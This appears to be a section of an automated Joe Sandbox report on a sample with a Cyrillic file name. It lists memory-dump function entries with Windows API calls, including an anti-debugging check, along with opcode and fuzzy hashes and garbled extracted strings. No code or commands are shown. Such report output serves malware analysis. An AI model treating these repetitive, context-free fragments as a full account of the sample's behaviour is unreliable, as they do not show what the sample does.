                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • FindCloseChangeNotification.KERNEL32 ref: 02DD08AF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 02DD0803
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: FileView
                        • String ID:
                        • API String ID: 3314676101-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 02DD0803
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: FileView
                        • String ID:
                        • API String ID: 3314676101-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetModuleHandleW.KERNEL32(00000000), ref: 02DDCEA6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetModuleHandleW.KERNEL32(00000000), ref: 02DDCEA6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • FindCloseChangeNotification.KERNEL32 ref: 02DD08AF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CheckRemoteDebuggerPresent.KERNEL32 ref: 0144EE5C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CheckDebuggerPresentRemote
                        • String ID:
                        • API String ID: 3662101638-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: Initialize
                        • String ID:
                        • API String ID: 2538663250-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: Timer
                        • String ID:
                        • API String ID: 2870079774-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: Timer
                        • String ID:
                        • API String ID: 2870079774-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: Initialize
                        • String ID:
                        • API String ID: 2538663250-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNEL32(?,?,?,?), ref: 02DD5460
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualFree.KERNELBASE(?,?,?), ref: 02DD55D5
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNEL32(?,?,?,?), ref: 02DD5460
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 564ecdc61a3244c650d1a3dcb6fb90403e2aae515f4ee4db102ef1675440885d
                        • Instruction ID: dd44e50c622671f713944f0a2c1783e378223882ba4d0f548e53c20d25d6d1c3
                        • Opcode Fuzzy Hash: 564ecdc61a3244c650d1a3dcb6fb90403e2aae515f4ee4db102ef1675440885d
                        • Instruction Fuzzy Hash: 561102B59006499FCB20DF9AD844ADEBBF8EB48320F208419E558A7350C779A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualFree.KERNELBASE(?,?,?), ref: 02DD55D5
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 416dcefb5f1403d6be9e6c871dd13bd2f0527525dac9734d18f842454205cbdf
                        • Instruction ID: 040a9b7f001d243ed79c066dc00f9785559d6e30aa6d86bafdfdc54d4d41e09f
                        • Opcode Fuzzy Hash: 416dcefb5f1403d6be9e6c871dd13bd2f0527525dac9734d18f842454205cbdf
                        • Instruction Fuzzy Hash: 871125B19006498FDB10DF9AD844BEEFBF8EF48320F208429E518A3351D738A944CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721188291.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13ed000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 81a55babcc85db613ddcc5529fb5f235ef6acbe57bdd1a3d7c56cd02d4a4da42
                        • Instruction ID: 5320450f75829aa1750d1b44d071c13058c81cd8d29a0fb56b1424eae4397ebb
                        • Opcode Fuzzy Hash: 81a55babcc85db613ddcc5529fb5f235ef6acbe57bdd1a3d7c56cd02d4a4da42
                        • Instruction Fuzzy Hash: B8210371504344DFDB05DF58D9C8F26BFA9FB98318F24C569E90A0B2D6C33AD416CAA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721188291.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13ed000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7ae386da9a0e27178f7d7c77014c534cc0f1e2141700d1a8c193b45ed0bd48c7
                        • Instruction ID: 70c6ec6251348a18da99a3e44a0e7fffd711c154dc6ff58d73f040695a9355fc
                        • Opcode Fuzzy Hash: 7ae386da9a0e27178f7d7c77014c534cc0f1e2141700d1a8c193b45ed0bd48c7
                        • Instruction Fuzzy Hash: ED210671500304DFDB15DF98D9C4F26BFA9FB88328F248569E9090A296C33AD416CAA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721248786.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13fd000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d9decba1fdb0c09194751d1cb8891bd2a5d9aa727da300911374e3368b430f0d
                        • Instruction ID: a618dffb399af839fdbc9872fe59001cb8148ec9f8a72160d10fcf47d0723402
                        • Opcode Fuzzy Hash: d9decba1fdb0c09194751d1cb8891bd2a5d9aa727da300911374e3368b430f0d
                        • Instruction Fuzzy Hash: 9C21F271604205DFDB15DF68D988F26BF69FB88358F20C56DEA0A4B356C33AD407CA62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721248786.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13fd000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0900113766dd33f78088383e67f57d882b02e3ce273e16330f4962081b4e55fa
                        • Instruction ID: 6a50e7a65b171cd2f9f41076d597876a4afd7c3b8ce19478720326e0051a6340
                        • Opcode Fuzzy Hash: 0900113766dd33f78088383e67f57d882b02e3ce273e16330f4962081b4e55fa
                        • Instruction Fuzzy Hash: 0E219F755093808FDB03CF24D994715BF71EB46218F28C5EED9498F2A7C33A980ACB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721188291.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13ed000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                        • Instruction ID: e7a84c38810322f13639f72e2eed0eebca39fab025bde50a169cac16dfc3ccb4
                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                        • Instruction Fuzzy Hash: 8A11DF72404280CFCB02CF44D9C4B16BFB1FB98318F2485A9D9090B296C336D45ACBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721188291.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13ed000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                        • Instruction ID: d9e9e615b2758f1b6d628f599bb471e323e5e936bed779b19f2e829dd429f4f4
                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                        • Instruction Fuzzy Hash: 0C11AF76504280CFDB16CF54D5C4B16BFB1FB88324F24C5A9D9490B697C33AD45ACBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721188291.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13ed000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4e1c6f4c4cdbd492528d2c4253a48a8cd52f688e802a23421cc904477a6072d
                        • Instruction ID: 31d41ccb068d160c29d13ab686760e19e0baf33130a8a28b618f6ab2714395ab
                        • Opcode Fuzzy Hash: b4e1c6f4c4cdbd492528d2c4253a48a8cd52f688e802a23421cc904477a6072d
                        • Instruction Fuzzy Hash: 0EF03776240640AFD3208F0AD884C22FBADEBC4634719C15AE84A4B652C231EC41CEA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721188291.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13ed000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8d08ae645927dc2554d984d0fb7149dad5521b83adf677ed68ffd64058aabb24
                        • Instruction ID: efbbbaf447f40393b151094fe19db193ed3387780c5a639d9d908e2e761bbe4d
                        • Opcode Fuzzy Hash: 8d08ae645927dc2554d984d0fb7149dad5521b83adf677ed68ffd64058aabb24
                        • Instruction Fuzzy Hash: 29F03775104780AFD325CF06C984C62BFF9EF8A6607198489E88A4B762C631FC42CF60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,8,d$\s]q$c!Ok$PS7
                        • API String ID: 0-1688611253
                        • Opcode ID: 383895430ea98552f1743a8074374ce42e091dfa9735d3dfea410851806bcf90
                        • Instruction ID: ea3e231e31c66d7d452917ae3e15f3afac16cb2765eee636c1c872328558f4f0
                        • Opcode Fuzzy Hash: 383895430ea98552f1743a8074374ce42e091dfa9735d3dfea410851806bcf90
                        • Instruction Fuzzy Hash: AC02AD76B043258FD754DF6DD8846AEBBE2BF88710F09456EE94ADB364DA30DC018B81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,8,d$\s]q$c!Ok$PS7
                        • API String ID: 0-1688611253
                        • Opcode ID: 25f8ad43b42e135eb6433debe987e97eea78cd88ce60817ffe30ef69c2cbb180
                        • Instruction ID: 4bc82cf149a93ed14feb607155ce9dd38866685636c67f45ee1cc52f8e62b392
                        • Opcode Fuzzy Hash: 25f8ad43b42e135eb6433debe987e97eea78cd88ce60817ffe30ef69c2cbb180
                        • Instruction Fuzzy Hash: 72C1C476F002258FD754DF6DD8946AEB7E2FF88660F15446AE94AEB360DA30DC01CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,8,d$\s]q$c!Ok$PS7
                        • API String ID: 0-1688611253
                        • Opcode ID: 960eb1e826d1393c6e65d725c08ed5c9dad66838a4d51052c1712ac81f93c31e
                        • Instruction ID: 1cabd3eaf0a8968f10750bde75e7770f9199f2c781cb88b795ba53e6d53f0036
                        • Opcode Fuzzy Hash: 960eb1e826d1393c6e65d725c08ed5c9dad66838a4d51052c1712ac81f93c31e
                        • Instruction Fuzzy Hash: EBB1C336F002259FD754DF6DD8946AEB7E2FBC4220F15456AE94AEB360DA30DC018B81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,8,d$\s]q$PS7
                        • API String ID: 0-94456105
                        • Opcode ID: a7a3560434906943a641f3d51bb1517036c6fdaa0e1f774a5fd052b71a3c52c1
                        • Instruction ID: 16f6fd21af6b1bff565576fbfc79555bba6e66f53b59e9581346b871adeef308
                        • Opcode Fuzzy Hash: a7a3560434906943a641f3d51bb1517036c6fdaa0e1f774a5fd052b71a3c52c1
                        • Instruction Fuzzy Hash: B5D19136B002159FD754DF6DD8846AEBBE2FF88320F15856EE949EB364DA30DC058B81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: 1Df$Lud.$Ax#
                        • API String ID: 0-882355127
                        • Opcode ID: 0538e0ae0f5072ddd366bc3df3a266fc6b5a4c485fc75a944869aad84dedf49a
                        • Instruction ID: 7c4322faa8352f5d39b8a69045aa07cd657fb555b4f112a5251f804a8bb37217
                        • Opcode Fuzzy Hash: 0538e0ae0f5072ddd366bc3df3a266fc6b5a4c485fc75a944869aad84dedf49a
                        • Instruction Fuzzy Hash: A6C1A272F105298BDB18CFADD88059EFBF7AB8831075AC5AAE815EB345D634DC458BC0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$_<]B$*ov
                        • API String ID: 0-391430726
                        • Opcode ID: e3303588a17a581cd06c06c0d34cc75a95aa49bd2130ef712a5fb57d750fe465
                        • Instruction ID: 9de858903722f95fcecf048d7b67b4ac8090f5c1e8144700b86d3d54f9373b2b
                        • Opcode Fuzzy Hash: e3303588a17a581cd06c06c0d34cc75a95aa49bd2130ef712a5fb57d750fe465
                        • Instruction Fuzzy Hash: CB812831B106268FCB44DF7DD8846AEBBF6BF9921070984AAE859DB351DB30DC05CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: =*dR$bay|$zozG
                        • API String ID: 0-744661480
                        • Opcode ID: 6ddcb8e327ba88e9162797efdbbc4d0779e508f4e3796e658bcadfdfb197a47c
                        • Instruction ID: 21f9f7e85b724956cb2e9491fdfca599cb2e33012c30840c34f0b5aa044a353d
                        • Opcode Fuzzy Hash: 6ddcb8e327ba88e9162797efdbbc4d0779e508f4e3796e658bcadfdfb197a47c
                        • Instruction Fuzzy Hash: 0D91A371B087918FC354CE2DC84465ABBE1BFC9650F0689ADE889DB361DA34DC04CF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: Wl9^$>3n$qzQ
                        • API String ID: 0-3979148012
                        • Opcode ID: 4edef0dee781b6981f66111ab388d1fefaa50fda080d129afaff03ebb1258091
                        • Instruction ID: 544cc227574c6953db4d0ee2089a47f0e9de5b7537b9abe88545e74213e84fad
                        • Opcode Fuzzy Hash: 4edef0dee781b6981f66111ab388d1fefaa50fda080d129afaff03ebb1258091
                        • Instruction Fuzzy Hash: 4AB16E75E002199FEB5CDFAAD8D46AEB7B1AF94315F04806AE526EB370DE309845CF40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: _<]B$}Tn\$*ov
                        • API String ID: 0-2845494251
                        • Opcode ID: a357b03890d9c8ab43734e582efea76068e4c9973d7746df6fcee1a324d50ad5
                        • Instruction ID: 931ddf9a925d160a42301472c62f1066319f0d56a1fde2e8ac37421580559cdb
                        • Opcode Fuzzy Hash: a357b03890d9c8ab43734e582efea76068e4c9973d7746df6fcee1a324d50ad5
                        • Instruction Fuzzy Hash: FA51B475F105258FCB14DF7DE48456DBBF6BF8864074A80AAE816DB364DA30DD11CB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: i:N8$Q}"
                        • API String ID: 0-4233569407
                        • Opcode ID: 9c3184897717d694cfd0b4848fa56f52c51de0fdd64d92f3efe8ca207e9ec253
                        • Instruction ID: 21d1905d0ea5f5d892661e16d3d7971423dacaf441318e051995d1b6e989b106
                        • Opcode Fuzzy Hash: 9c3184897717d694cfd0b4848fa56f52c51de0fdd64d92f3efe8ca207e9ec253
                        • Instruction Fuzzy Hash: 00F1D276B146218FE714CE2DC88051BB7E2BF98650B464A6FF895DB370EA71DC05CB82
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: E&$"ByG
                        • API String ID: 0-3030847990
                        • Opcode ID: 4b8664db5269171df3397b1cebd09a7dd2b65b2a153f14b47992e666ce7e8a62
                        • Instruction ID: 397c73f3416a2ae87d4f8350b6e50f3396cc1656c49d3bda368d03283aef1671
                        • Opcode Fuzzy Hash: 4b8664db5269171df3397b1cebd09a7dd2b65b2a153f14b47992e666ce7e8a62
                        • Instruction Fuzzy Hash: 6791D476F046258FC755CF78C854499BBF2BF89320B1A85AAD845EB361DB34DC41CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: bay|$~"
                        • API String ID: 0-3683321486
                        • Opcode ID: 4c7136d72a18ccc3eb151134933bafff2621542b15868fad272a6f79cf9c7a8d
                        • Instruction ID: 630727bd894199f68cb745463030c53bf583b80c6cc5c40fa1e7e8163bc2fd91
                        • Opcode Fuzzy Hash: 4c7136d72a18ccc3eb151134933bafff2621542b15868fad272a6f79cf9c7a8d
                        • Instruction Fuzzy Hash: 9771B672A087618FD354CF3DC84465AB7E1BB85250F0689AEE899DB361DA34DC05CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: _<]B$*ov
                        • API String ID: 0-3575464964
                        • Opcode ID: 29679706697a2e9339a854f1f38347640d2cbd1a127b73b1cbf5201d0cdbca8f
                        • Instruction ID: 9f15737a61cb15cf32fd507a14d0cb4270e5f32305b4b9929cf57a7855675a24
                        • Opcode Fuzzy Hash: 29679706697a2e9339a854f1f38347640d2cbd1a127b73b1cbf5201d0cdbca8f
                        • Instruction Fuzzy Hash: 1351D176F005259FDB18DFA9D8409AEBBFAFF88640759406AE805EB360E731CD10CB90
